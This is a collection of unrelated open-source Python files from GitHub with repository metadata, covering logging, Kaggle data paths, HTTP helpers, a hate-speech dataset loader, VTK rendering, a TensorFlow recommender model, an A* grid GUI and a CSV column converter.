logger.critical(
'A serious error, indicating that the program itself may be unable to continue running.')
def fail_something():
raise SystemError()
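# Illustrative usage sketch (assumption: run directly as a script): configure
# root logging once so the module-level logger's messages become visible.
if __name__ == "__main__":
    logging.basicConfig(
        level=logging.DEBUG,
        format="%(asctime)s %(name)s %(levelname)s %(message)s",
    )
    do_something()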
| jmhart/python-template | src/stuff/thing.py | thing.py | py | 656 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 3,
"usage_type": "call"
}
] |
2986896269 | import os
import h5py
import numpy as np
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
if 'KAGGLE_BASE_URL' in os.environ:
challenge = 'g2net-detecting-continuous-gravitational-waves'
PATH_TO_TEST_FOLDER = os.path.join('/kaggle', 'input', challenge, 'test')
PATH_TO_TRAIN_FOLDER = os.path.join('/kaggle', 'input', challenge, 'train')
PATH_TO_LABEL_FILE = os.path.join('/kaggle', 'input', challenge, 'train_labels.csv')
PATH_TO_MODEL_FOLDER = os.path.join('/kaggle', 'input', 'models')
PATH_TO_LOG_FOLDER = os.path.join('/kaggle', 'temp', 'logs')
PATH_TO_CACHE_FOLDER = os.path.join('/kaggle', 'working', 'cache')
PATH_TO_SIGNAL_FOLDER = os.path.join('/kaggle', 'working', 'signal')
PATH_TO_NOISE_FOLDER = os.path.join('/kaggle', 'working', 'noise')
PATH_TO_DYNAMIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'dynamic')
PATH_TO_STATIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'static')
    PATH_TO_SOURCE_FOLDER = os.path.join('/kaggle', 'working', 'src')
    # Assumed location (not in the original): without it the mkdir block below
    # raises NameError for PATH_TO_TMP_FOLDER when running on Kaggle.
    PATH_TO_TMP_FOLDER = os.path.join('/kaggle', 'temp', 'tmp')
else:
PATH_TO_TEST_FOLDER = os.path.join(os.getcwd(), 'test_data')
PATH_TO_TRAIN_FOLDER = os.path.join(os.getcwd(), 'train_data')
PATH_TO_MODEL_FOLDER = os.path.join(os.getcwd(), 'models_saved')
PATH_TO_LOG_FOLDER = os.path.join(os.getcwd(), 'logs')
PATH_TO_CACHE_FOLDER = os.path.join(os.getcwd(), 'cache')
PATH_TO_LABEL_FILE = os.path.join(os.getcwd(), 'train_labels.csv')
PATH_TO_SIGNAL_FOLDER = os.path.join(os.getcwd(), 'signal')
PATH_TO_NOISE_FOLDER = os.path.join(os.getcwd(), 'noise')
PATH_TO_DYNAMIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'dynamic')
PATH_TO_STATIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'static')
PATH_TO_TMP_FOLDER = os.path.join(os.getcwd(), 'tmp')
PATH_TO_SOURCE_FOLDER = os.path.dirname(os.path.abspath(os.path.dirname(__file__)))
# setup
if not os.path.isdir(PATH_TO_TRAIN_FOLDER):
os.makedirs(PATH_TO_TRAIN_FOLDER)
if not os.path.isdir(PATH_TO_TEST_FOLDER):
os.makedirs(PATH_TO_TEST_FOLDER)
if not os.path.isdir(PATH_TO_MODEL_FOLDER):
os.makedirs(PATH_TO_MODEL_FOLDER)
if not os.path.isdir(PATH_TO_LOG_FOLDER):
os.makedirs(PATH_TO_LOG_FOLDER)
if not os.path.isdir(PATH_TO_CACHE_FOLDER):
os.makedirs(PATH_TO_CACHE_FOLDER)
if not os.path.isdir(PATH_TO_NOISE_FOLDER):
os.makedirs(PATH_TO_NOISE_FOLDER)
if not os.path.isdir(PATH_TO_SIGNAL_FOLDER):
os.makedirs(PATH_TO_SIGNAL_FOLDER)
if not os.path.isdir(PATH_TO_DYNAMIC_NOISE_FOLDER):
os.makedirs(PATH_TO_DYNAMIC_NOISE_FOLDER)
if not os.path.isdir(PATH_TO_STATIC_NOISE_FOLDER):
os.makedirs(PATH_TO_STATIC_NOISE_FOLDER)
if not os.path.isdir(PATH_TO_TMP_FOLDER):
os.makedirs(PATH_TO_TMP_FOLDER)
if 'IS_CHARLIE' in os.environ:
print('We are on Charlie')
os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
#os.environ["PYTORCH_CUDA_ALLOC_CONF"] = "max_split_size_mb:2000"
def print_red(*text):
print(f'{bcolors.FAIL}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def print_blue(*text):
print(f'{bcolors.OKCYAN}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def print_green(*text):
print(f'{bcolors.OKGREEN}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def print_yellow(*text):
print(f'{bcolors.WARNING}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def open_hdf5_file(path_to_file):
result = {}
with h5py.File(path_to_file, 'r') as hd5_file:
base_key = list(hd5_file.keys())[0]
result['base_key'] = base_key
result['frequencies'] = np.array(hd5_file[f'{base_key}/frequency_Hz'])
result['h1'] = {}
result['l1'] = {}
result['h1']['amplitudes'] = np.array(hd5_file[f'{base_key}/H1/SFTs'])
result['l1']['amplitudes'] = np.array(hd5_file[f'{base_key}/L1/SFTs'])
result['h1']['timestamps'] = np.array(hd5_file[f'{base_key}/H1/timestamps_GPS'])
result['l1']['timestamps'] = np.array(hd5_file[f'{base_key}/L1/timestamps_GPS'])
return result
def get_df_dynamic_noise():
assert len(os.listdir(PATH_TO_DYNAMIC_NOISE_FOLDER)) != 0, 'There must be data in noise folder'
return [os.path.join(PATH_TO_DYNAMIC_NOISE_FOLDER, p) for p in os.listdir(PATH_TO_DYNAMIC_NOISE_FOLDER)]
def get_df_static_noise():
assert len(os.listdir(PATH_TO_STATIC_NOISE_FOLDER)) != 0, 'There must be data in static_noise folder'
return [os.path.join(PATH_TO_STATIC_NOISE_FOLDER, p) for p in os.listdir(PATH_TO_STATIC_NOISE_FOLDER)]
def get_df_signal():
assert len(os.listdir(PATH_TO_SIGNAL_FOLDER)) != 0, 'There must be data in signal folder'
all_files = [os.path.join(PATH_TO_SIGNAL_FOLDER, p) for p in os.listdir(PATH_TO_SIGNAL_FOLDER)]
all_files = sorted(all_files)
offset = len(all_files) // 2
return [(all_files[i], all_files[i+offset]) for i in range(offset)]
def normalize_image(img):
img += abs(np.min(img))
img /= np.max(img)
img *= 255
return img
if __name__ == '__main__':
print_red('This', 'text', 'is red', 1, 23)
print_blue('This', 'text', 'is blue', 1, 23)
print_green('This', 'text', 'is green', 1, 23)
print_yellow('This', 'text', 'is yellow', 1, 23)
| felix-20/gravitational_oceans | src/helper/utils.py | utils.py | py | 5,376 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_nu... |
12803394908 | import urllib2
import json
headers = {'Content-Type': 'application/json; charset=utf-8'}
XXX_HOST = "http://xxx.xxx.com/xxx-app/"
# POST request with a JSON payload
def post_json(url, header, request_data):
req = urllib2.Request(url, request_data, header)
page = urllib2.urlopen(req)
res = page.read()
page.close()
return res
YYY_HOST = "http://yyy.yyy.com/yyy-app/"
# GET request
def get_(param1, param2):
url = YYY_HOST + "yyyy/yyyy?param1=" + \
        str(param1) + "&param2=" + str(param2) + "&param3=VIP"
req = urllib2.Request(url)
page = urllib2.urlopen(req, timeout=5000)
res = page.read()
page.close()
return json.loads(res)["data"] | AldrichYang/HelloPython2 | src/http/http_helper.py | http_helper.py | py | 690 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "urllib2.Request",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "urllib2.urlopen",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "urllib2.Request",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "urllib2.urlopen",
... |
13425691279 | ### Unzip the Dataset
# importing the zipfile module
from zipfile import ZipFile
import pandas as pd
import random
# loading the temp.zip and creating a zip object
with ZipFile("./resources/Sentences_from_Stormfront_dataset.zip", 'r') as zip_object:
    # Extracting all the members of the zip
    # into a specific location.
    zip_object.extractall(path="./resources/")
path_to_extracted_folder = './resources/Sentences_from_Stormfront_dataset/'
path_to_data_files = './resources/Sentences_from_Stormfront_dataset/all_files/'
def get_500_stormfront_non_hateful_data():
annotation_metadata = pd.read_csv(path_to_extracted_folder + 'annotations_metadata.csv')
list_of_additional_data = []
hard_labels_of_additional_data = []
for i in range(500):
rand_num = random.randint(0, len(annotation_metadata) - 1)
while annotation_metadata['label'][rand_num] == 'hate':
rand_num = random.randint(0, len(annotation_metadata) - 1)
file_address = path_to_data_files + annotation_metadata['file_id'][rand_num] + '.txt'
text = open(file_address, "r").read()
list_of_additional_data.append(text)
hard_labels_of_additional_data.append(0.0)
return list_of_additional_data, hard_labels_of_additional_data
def get_stormfront_hateful_data():
annotation_metadata = pd.read_csv(path_to_extracted_folder + 'annotations_metadata.csv')
list_of_additional_data = []
hard_labels_of_additional_data = []
for i in range(len(annotation_metadata)):
if annotation_metadata['label'][i] == 'hate':
file_address = path_to_data_files + annotation_metadata['file_id'][i] + '.txt'
text = open(file_address, "r").read()
list_of_additional_data.append(text)
hard_labels_of_additional_data.append(1.0)
return list_of_additional_data, hard_labels_of_additional_data
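# Illustrative usage sketch (not in the original script): combine the 500
# sampled non-hateful sentences with every hateful sentence into one
# labelled list ready for downstream training.
if __name__ == "__main__":
    texts, labels = get_500_stormfront_non_hateful_data()
    hate_texts, hate_labels = get_stormfront_hateful_data()
    texts.extend(hate_texts)
    labels.extend(hate_labels)
    print(f"{len(texts)} sentences, {int(sum(labels))} labelled as hate")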
| Speymanhs/SemEval_2023_Task_11_Lonea | reading_dataset_stormfront.py | reading_dataset_stormfront.py | py | 1,887 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "zipfile.ZipFile",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "random.randint",
"l... |
71578985703 | #!/usr/bin/env python
import vtk
def main():
pd_fn, scene_fn = get_program_parameters()
colors = vtk.vtkNamedColors()
polyData = ReadPolyData(pd_fn)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputData(polyData)
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetDiffuseColor(colors.GetColor3d("Crimson"))
actor.GetProperty().SetSpecular(.6)
actor.GetProperty().SetSpecularPower(30)
renderer = vtk.vtkRenderer()
renderWindow = vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindowInteractor = vtk.vtkRenderWindowInteractor()
renderWindowInteractor.SetRenderWindow(renderWindow)
renderer.AddActor(actor)
renderer.SetBackground(colors.GetColor3d("Silver"))
# Interact to change camera.
renderWindow.Render()
renderWindowInteractor.Start()
# After the interaction is done, save the scene.
SaveSceneToFile(scene_fn, actor, renderer.GetActiveCamera())
renderWindow.Render()
renderWindowInteractor.Start()
# After interaction , restore the scene.
RestoreSceneFromFile(scene_fn, actor, renderer.GetActiveCamera())
renderWindow.Render()
renderWindowInteractor.Start()
def get_program_parameters():
import argparse
description = 'Saving a scene to a file.'
epilogue = '''
'''
parser = argparse.ArgumentParser(description=description, epilog=epilogue,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('data_file', help='A polydata file e.g. Armadillo.ply.')
parser.add_argument('scene_file', help='The file to save the scene to.')
args = parser.parse_args()
return args.data_file, args.scene_file
def ReadPolyData(file_name):
import os
path, extension = os.path.splitext(file_name)
extension = extension.lower()
if extension == ".ply":
reader = vtk.vtkPLYReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".vtp":
        reader = vtk.vtkXMLPolyDataReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".obj":
reader = vtk.vtkOBJReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".stl":
reader = vtk.vtkSTLReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".vtk":
        reader = vtk.vtkPolyDataReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".g":
reader = vtk.vtkBYUReader()
reader.SetGeometryFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
else:
# Return a None if the extension is unknown.
poly_data = None
return poly_data
def SaveSceneToFile(file_name, actor, camera):
# Actor
# Position, orientation, origin, scale, usrmatrix, usertransform
# Camera
# FocalPoint, Position, ViewUp, ViewAngle, ClippingRange
fp_format = '{0:.6f}'
res = dict()
res['Camera:FocalPoint'] = ', '.join(fp_format.format(n) for n in camera.GetFocalPoint())
res['Camera:Position'] = ', '.join(fp_format.format(n) for n in camera.GetPosition())
res['Camera:ViewUp'] = ', '.join(fp_format.format(n) for n in camera.GetViewUp())
res['Camera:ViewAngle'] = fp_format.format(camera.GetViewAngle())
res['Camera:ClippingRange'] = ', '.join(fp_format.format(n) for n in camera.GetClippingRange())
with open(file_name, 'w') as f:
for k, v in res.items():
f.write(k + ' ' + v + '\n')
def RestoreSceneFromFile(file_name, actor, camera):
import re
# Some regular expressions.
reCP = re.compile(r'^Camera:Position')
reCFP = re.compile(r'^Camera:FocalPoint')
reCVU = re.compile(r'^Camera:ViewUp')
reCVA = re.compile(r'^Camera:ViewAngle')
reCCR = re.compile(r'^Camera:ClippingRange')
keys = [reCP, reCFP, reCVU, reCVA, reCCR]
# float_number = re.compile(r'[^0-9.\-]*([0-9e.\-]*[^,])[^0-9.\-]*([0-9e.\-]*[^,])[^0-9.\-]*([0-9e.\-]*[^,])')
# float_scalar = re.compile(r'[^0-9.\-]*([0-9.\-e]*[^,])')
res = dict()
with open(file_name, 'r') as f:
for cnt, line in enumerate(f):
if not line.strip():
continue
line = line.strip().replace(',', '').split()
for i in keys:
m = re.match(i, line[0])
                if m:
                    k = m.group(0)
                    # Convert the rest of the line to floats.
                    v = list(map(float, line[1:]))
                    if len(v) == 1:
                        res[k] = v[0]
                    else:
                        res[k] = v
for k, v in res.items():
if re.match(reCP, k):
camera.SetPosition(v)
elif re.match(reCFP, k):
camera.SetFocalPoint(v)
elif re.match(reCVU, k):
camera.SetViewUp(v)
elif re.match(reCVA, k):
camera.SetViewAngle(v)
elif re.match(reCCR, k):
camera.SetClippingRange(v)
if __name__ == '__main__':
main()
| lorensen/VTKExamples | src/Python/Utilities/SaveSceneToFile.py | SaveSceneToFile.py | py | 5,409 | python | en | code | 319 | github-code | 36 | [
{
"api_name": "vtk.vtkNamedColors",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "vtk.vtkPolyDataMapper",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "vtk.vtkActor",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "vtk.vtkRenderer"... |
3479784873 | # This is the model definition of retrieval model.
from typing import List, Dict, Tuple, Text
import os
import tensorflow as tf
import tensorflow_recommenders as tfrs
import numpy as np
from . import dataset as ds, params
# Get unique query and candidate and timestamp.
unique_user_ids, unique_therapist_ids = ds.get_unique_query_candidate()
timestamps, timestamps_buckets = ds.get_timestamps()
# Get candidate from dataset.
candidate = ds.get_candidate()
embedding_dimension = params.embedding_dimension
class UserModel(tf.keras.Model):
def __init__(self, use_timestamps=False):
super(UserModel, self).__init__()
# self.use_timestamps = use_timestamps
self.user_model = tf.keras.Sequential([
tf.keras.layers.StringLookup(
vocabulary=unique_user_ids, mask_token=None),
# We add an additional embedding to account for unknown tokens.
tf.keras.layers.Embedding(
len(unique_user_ids) + 1, embedding_dimension)
])
# if self.use_timestamps:
# self.timestamp_model = tf.keras.Sequential([
# tf.keras.layers.Discretization(timestamps_buckets.tolist()),
# tf.keras.layers.Embedding(
# len(timestamps_buckets) + 1, embedding_dimension)
# ])
# self.normalized_timestamp = tf.keras.layers.Normalization(
# axis=None
# )
# self.normalized_timestamp.adapt(timestamps)
def call(self, inputs):
# if not self.use_timestamps:
return self.user_model(inputs["user_id"])
# return tf.concat([
# self.user_model(inputs["user_id"]),
# self.timestamp_model(inputs["timestamp"]),
# tf.reshape(self.normalized_timestamp(inputs["timestamp"]), (-1, 1))
# ], axis=1)
class QueryModel(tf.keras.Model):
"""Model for encoding user queries."""
def __init__(self, layer_sizes):
"""Model for encoding user queries.
Args:
layer_sizes:
A list of integers where the i-th entry represents the number of units
the i-th layer contains.
"""
super().__init__()
# We first use the user model for generating embeddings.
self.embedding_model = UserModel()
# Then construct the layers.
self.dense_layers = tf.keras.Sequential()
# Use the ReLU activation for all but the last layer.
for layer_size in layer_sizes[:-1]:
self.dense_layers.add(tf.keras.layers.Dense(
layer_size, activation="relu"))
# No activation for the last layer.
for layer_size in layer_sizes[-1:]:
self.dense_layers.add(tf.keras.layers.Dense(layer_size))
def call(self, inputs):
feature_embedding = self.embedding_model(inputs)
return self.dense_layers(feature_embedding)
class TherapistModel(tf.keras.Model):
def __init__(self):
super().__init__()
max_token = 10_000
self.title_embedding = tf.keras.Sequential([
tf.keras.layers.StringLookup(
vocabulary=unique_therapist_ids, mask_token=None),
tf.keras.layers.Embedding(
len(unique_therapist_ids) + 1, embedding_dimension)
])
self.title_vectorizer = tf.keras.layers.TextVectorization(
max_tokens=max_token
)
self.title_text_embedding = tf.keras.Sequential([
self.title_vectorizer,
tf.keras.layers.Embedding(
max_token, embedding_dimension, mask_zero=True),
tf.keras.layers.GlobalAveragePooling1D()
])
self.title_vectorizer.adapt(candidate)
def call(self, inputs):
return tf.concat([
self.title_embedding(inputs),
self.title_text_embedding(inputs)
], axis=1)
class CandidateModel(tf.keras.Model):
"""Model for encoding therapists."""
def __init__(self, layer_sizes):
"""Model for encoding therapists.
Args:
layer_sizes:
A list of integers where the i-th entry represents the number of units
the i-th layer contains.
"""
super().__init__()
self.embedding_model = TherapistModel()
# Then construct the layers.
self.dense_layers = tf.keras.Sequential()
# Use the ReLU activation for all but the last layer.
for layer_size in layer_sizes[:-1]:
self.dense_layers.add(tf.keras.layers.Dense(
layer_size, activation="relu"))
# No activation for the last layer.
for layer_size in layer_sizes[-1:]:
self.dense_layers.add(tf.keras.layers.Dense(layer_size))
def call(self, inputs):
feature_embedding = self.embedding_model(inputs)
return self.dense_layers(feature_embedding)
class RetrievalDefinition(tfrs.Model):
def __init__(self):
super().__init__()
self.query_model: tf.keras.Model = QueryModel(params.layer_size)
self.candidate_model: tf.keras.Model = CandidateModel(
params.layer_size)
self.task: tf.keras.layers.Layer = tfrs.tasks.Retrieval(
metrics=tfrs.metrics.FactorizedTopK(
candidates=candidate.batch(128).map(self.candidate_model)
)
)
def compute_loss(self, features: Dict[Text, tf.Tensor], training=False) -> tf.Tensor:
# We pick out the user features and pass them into the user model.
user_embeddings = self.query_model({
"user_id": features["user_id"],
})
# And pick out the therapist features and pass them into the therapist model,
# getting embeddings back.
positive_therapist_embeddings = self.candidate_model(
features["therapist_id"])
# The task computes the loss and the metrics.
return self.task(user_embeddings, positive_therapist_embeddings, compute_metrics=not training)
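# Illustrative training sketch (not part of the original module). How the
# {"user_id", "therapist_id"} training tf.data.Dataset is built is not shown
# here, so it is taken as a parameter; the compile/fit pattern below is the
# usual tensorflow_recommenders retrieval workflow.
def train_retrieval_model(train_dataset: tf.data.Dataset, epochs: int = 3) -> RetrievalDefinition:
    model = RetrievalDefinition()
    model.compile(optimizer=tf.keras.optimizers.Adagrad(learning_rate=0.1))
    model.fit(train_dataset.batch(4096).cache(), epochs=epochs)
    return model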
| thomiaditya/theia | theia/config/recommender/retrieval_definition.py | retrieval_definition.py | py | 6,028 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.keras",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.Sequential",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name"... |
37248697117 | # Importing libraries and modules
from tkinter import *
from PIL import ImageTk, Image
import time
from tkinter import messagebox
from tkinter.filedialog import askopenfilename
# Start of GUI
root = Tk()
root.title("A-Star Grid World")
# Grid Initialization
# Ask the user if he wants to load a pre-deined world map
result = messagebox.showinfo("Choose Location","Give path of A-Star Grid World Map")
filename = askopenfilename() # show an "Open" dialog box and return the path to the selected file
# filename = "/Users/abhianshusingla/Documents/IS_Project/A-Star/map1.txt"
# Read a grid world from pre-defined values
read_file = open(filename, "r")
read_str = str(read_file.read())
read_str = read_str.split("\n")
# Initialize start point
token = read_str[0].split(" ")
init = []
init.append(int(token[0]))
init.append(int(token[1]))
# Initialize goal point
token = read_str[1].split(" ")
goal = []
goal.append(int(token[0]))
goal.append(int(token[1]))
# Create grid
grid = []
for i in range(2, len(read_str)):
token = read_str[i].split(" ")
if(len(token) != 1):
grid.append(list(map(int, token)))
# Size of Grid
rows = len(grid)
columns = len(grid[0])
# GUI Parameters
sleep_time = 9.9
bg_color = "PINK"
fg_color1 = "BLACK"
fg_color2 = "PURPLE"
fontStyle = "Chalkboard"
cell_size = 50
offset = 10
grids = {}
# Frames
main_frame = Frame(root, bg = bg_color)
main_frame.pack()
left_frame = Frame(main_frame, bg = bg_color)
left_frame.pack(side=LEFT)
right_frame = Frame(main_frame, bg = bg_color)
right_frame.pack(side=TOP)
# Left Frame Functionality
# Creating a 2D Grid
def createGrid():
for i in range(0,rows + 1):
x_start = offset
y = i * cell_size + offset
x_end = columns * cell_size + offset
gridCanvas.create_line([(x_start,y),(x_end,y)])
for i in range(0,columns + 1):
y_start = offset
x = i * cell_size + offset
y_end = rows * cell_size + offset
gridCanvas.create_line([(x,y_start),(x,y_end)])
for i in range(0, rows):
temp = []
for j in range(0, columns):
x = i * cell_size + offset
y = j * cell_size + offset
grids[(i,j)] = (x,y)
temp.append((x,y))
return grids
# Load all images
def loadImages():
img_robot = Image.open("/Users/abhianshusingla/Documents/DynamicPathPlanning/images/robot1.png")
img_robot = img_robot.resize((cell_size, cell_size))
gridCanvas.img_robot = (ImageTk.PhotoImage(img_robot))
img_target = Image.open("/Users/abhianshusingla/Documents/DynamicPathPlanning/images/target.png")
img_target = img_target.resize((cell_size, cell_size))
gridCanvas.img_target = (ImageTk.PhotoImage(img_target))
img_start = Image.open("/Users/abhianshusingla/Documents/DynamicPathPlanning/images/start.png")
img_start = img_start.resize((cell_size, cell_size))
gridCanvas.img_start = (ImageTk.PhotoImage(img_start))
img_wall2 = Image.open("/Users/abhianshusingla/Documents/DynamicPathPlanning/images/wall2.png")
img_wall2 = img_wall2.resize((cell_size, cell_size))
gridCanvas.img_wall2 = (ImageTk.PhotoImage(img_wall2))
img_wall1 = Image.open("/Users/abhianshusingla/Documents/DynamicPathPlanning/images/wall1.png")
img_wall1 = img_wall1.resize((cell_size, cell_size))
gridCanvas.img_wall1 = (ImageTk.PhotoImage(img_wall1))
# Draws robot at cell coordinates x and y
def drawRobot(x,y):
x1 = grids[(x,y)][0]
y1 = grids[(x,y)][1]
gridCanvas.create_image(y1, x1, image=gridCanvas.img_robot, anchor='nw')
# Draws house at cell coordinates x and y
def drawStart(x,y):
x1 = grids[(x,y)][0]
y1 = grids[(x,y)][1]
gridCanvas.create_image(y1, x1, image=gridCanvas.img_robot, anchor='nw')
# Draws wall at cell coordinates x and y
def drawWall(x,y):
x1 = grids[(x,y)][0]
y1 = grids[(x,y)][1]
gridCanvas.create_image(y1, x1, image=gridCanvas.img_wall1, anchor='nw')
# Draws wall at cell coordinates x and y
def drawWall2(x,y):
x1 = grids[(x,y)][0]
y1 = grids[(x,y)][1]
gridCanvas.create_image(y1, x1, image=gridCanvas.img_wall2, anchor='nw')
# Draws flag at cell coordinates x and y
def drawTarget(x,y):
x1 = grids[(x,y)][0]
y1 = grids[(x,y)][1]
gridCanvas.create_image(y1, x1, image=gridCanvas.img_target, anchor='nw')
# Writes text at cell coordinates x and y
def drawText(x,y,f,g,h,c):
x1 = grids[(x,y)][0]
y1 = grids[(x,y)][1]
costs = str(str(f) + "\n" + str(g) + "\n" + str(h))
if(not (goal[0] == x and goal[1] == y)):
gridCanvas.create_rectangle(y1, x1, y1 + cell_size, x1 + cell_size, fill=c)
gridCanvas.create_text(y1, x1, text = costs, anchor='nw', state = 'disabled')
# Reinitialization of code
def restart():
for i in range(rows):
for j in range(columns):
x1 = grids[(i,j)][0]
y1 = grids[(i,j)][1]
if(grid[i][j] != 1):
gridCanvas.create_rectangle(y1, x1, y1 + cell_size, x1 + cell_size, fill = "white")
if(i == init[0] and j == init[1]):
drawStart(i,j)
if(i == goal[0] and j == goal[1]):
drawTarget(i,j)
# if(grid[i][j] == 1):
# drawWall2(i,j)
# Creation of Grid Canvas
gridCanvas = Canvas(left_frame, height = rows * cell_size + 2 * offset, width = columns * cell_size + 2 * offset)
gridCanvas.pack(fill=BOTH, expand = True)
# Creation of Grid
grids = createGrid()
# Loading all the images
loadImages()
# Draw Start, Obstacle and Goal Images
drawStart(init[0],init[1])
drawTarget(goal[0],goal[1])
for i in range(rows):
for j in range(columns):
if(grid[i][j] == 1):
drawWall2(i,j)
# Right Frame Functionality
which_heuristic = True
isplay = False
cost = 1
D = 1
# Selection of Heuristic
def selectHeuristic():
global which_heuristic
which_heuristic = (env.get() == 1)
return which_heuristic
# check Play Pause Button
def play():
global isplay
if(isplay):
isplay = False
else:
isplay = True
return isplay
# Get sleep time for speed purpose
def get_sleep():
global sleep_time
sleep_time = speed_bar.get()
return sleep_time
# G- cost
def g_cost():
global cost
cost = float(cost_entry.get())
return cost
# D cost
def get_D():
global D
D = float(D_entry.get())
return D
# Controls
control_label = Label(right_frame, text="Controls",font=("Chalkboard", 20), fg = "RED", bg = bg_color)
control_label.pack(anchor = N)
# Heuristics
heuristic_label = Label(right_frame, text="Heuristsics", font=(fontStyle, 16), fg = fg_color1, bg = bg_color)
heuristic_label.pack(anchor = W)
env = IntVar()
env.set(1)
Radiobutton(right_frame, text="Manhattan", variable=env, value=1, command = selectHeuristic, font=(fontStyle, 16), fg = fg_color2, bg = bg_color).pack(anchor=W)
Radiobutton(right_frame, text="Euclidean", variable=env, value=2, command = selectHeuristic, font=(fontStyle, 16), fg = fg_color2, bg = bg_color).pack(anchor=W)
# Play/Pause
play_button = Button(right_frame, command = play, bg = bg_color, fg = fg_color2)
photo_button = ImageTk.PhotoImage(Image.open("/Users/abhianshusingla/Documents/DynamicPathPlanning/images/play1.png").resize((30, 30)))
play_button.config(image=photo_button,width="30",height="30")
play_button.pack()
# Speed Bar
speed_bar = Scale(right_frame, from_= 0, to= 10,length = 200, orient=HORIZONTAL, font=(fontStyle, 16), fg = fg_color2, bg = bg_color)
speed_bar.set(7)
speed_bar.pack(anchor=W)
speed_label = Label(right_frame, text="Speed", font=(fontStyle, 16), fg = fg_color2, bg = bg_color)
speed_label.pack()
# g-Cost
cost_frame = Frame(right_frame)
cost_frame.pack(anchor = W)
cost_label = Label(cost_frame, text = "G-Cost", font=(fontStyle, 16), fg = fg_color2, bg = bg_color)
cost_label.pack(side = LEFT)
cost_entry = Entry(cost_frame, width = 3, bg = bg_color, fg = fg_color2)
cost_entry.pack()
cost_entry.insert(0,1)
# D-value
D_frame = Frame(right_frame)
D_frame.pack(anchor = W)
D_label = Label(D_frame, text = "D-value", font=(fontStyle, 16), fg = fg_color2, bg = bg_color)
D_label.pack(side = LEFT)
D_entry = Entry(D_frame, width = 3, bg = bg_color, fg = fg_color2)
D_entry.pack(side = RIGHT)
D_entry.insert(3,1)
# Main Loop
def start():
root.mainloop()
time.sleep(0.1)
| abhianshi/DynamicPathPlanning | src/AStarGUI.py | AStarGUI.py | py | 8,336 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "tkinter.messagebox.showinfo",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "tkinter.filedialog.askopenfilename",
"line_number": 17,
"usage_type": "call"
},
{
... |
33532139383 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
A script to convert the column names from CamelCase to snake_case.
Typically you would run this file from a command line like this:
ipython3.exe -i -- /deploy/cbmcfs3_runner/scripts/orig/convert_column_case.py
"""
# Built-in modules #
import os
# Third party modules #
import pandas
from tqdm import tqdm
# First party modules #
import autopaths
from autopaths import Path
from autopaths.auto_paths import AutoPaths
from plumbing.common import camel_to_snake
from plumbing.cache import property_cached
# Internal modules #
from cbmcfs3_runner.core.continent import continent
# Constants #
home = os.environ.get('HOME', '~') + '/'
###############################################################################
class CaseConverter(object):
"""
This class takes many of the CSV files in "export/" and "orig/" and
converts their title case in their column names.
"""
all_paths = """
/orig/coefficients.csv
/orig/silv_treatments.csv
/export/ageclass.csv
/export/inventory.csv
/export/classifiers.csv
/export/disturbance_events.csv
/export/disturbance_types.csv
/export/transition_rules.csv
/export/yields.csv
/export/historical_yields.csv
/fusion/back_inventory_aws.csv
"""
def __init__(self, country):
# Default attributes #
self.country = country
# Automatically access paths based on a string of many subpaths #
self.paths = AutoPaths(self.country.data_dir, self.all_paths)
def __call__(self):
for p in self.paths:
# Some countries don't have that fusion file #
if not p: continue
# Read into memory #
df = pandas.read_csv(str(p))
# Change #
df = df.rename(columns = camel_to_snake)
# Write back to disk #
df.to_csv(str(p), index=False, float_format='%g')
def fix_spelling(self):
"""Some words were written wrongly but not in all countries."""
# Read #
